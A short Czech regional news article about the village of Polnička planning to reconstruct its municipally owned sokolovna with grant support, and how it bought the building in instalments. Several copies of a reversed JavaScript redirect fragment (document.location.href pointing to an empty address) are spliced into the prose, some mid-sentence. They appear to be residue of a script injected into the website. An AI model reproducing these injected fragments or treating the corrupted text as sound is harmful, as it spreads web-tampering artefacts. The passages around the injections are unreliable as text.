Rainbow page separator

V Polničce plánují rekonstrukci sokolovny s podporou dotace

Čtvrtek, 2. srpna 2018

Polnička / Současný dispoziční stav sokolovny, která je v majetku obce, zmapovala studie možné rekonstrukce objektu projekční kanceláře. Záměrem obce je věnovat se přípravám na případnou přestavbu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za podpory dotačních programů. Za tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelem byla rovněž ustanovena pracovní skupina, která shromažďuje návrhy na zlepšení současného stavu objektu a také návrhy na jeho další možné využití.
Polnička se rozhodla získat tamní sokolovnu do svého vlastnictví koncem předloňského roku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prostřednictvím koupě na splátky. Cena byla tehdy stanovena na dva miliony korun s tím, že Polnička za budovu zaplatí postupně v průběhu čtyř let, vždycky jednou půlmilionovou splátkou ročně.
Objekt však na rekonstrukci potřebuje další finanční investici, která se pohybuje v řádu milionů korun. Obec sokolovnu využívá pro potřeby základní školy, ale rovněž pro pořádání různých kulturních a společenských akcí.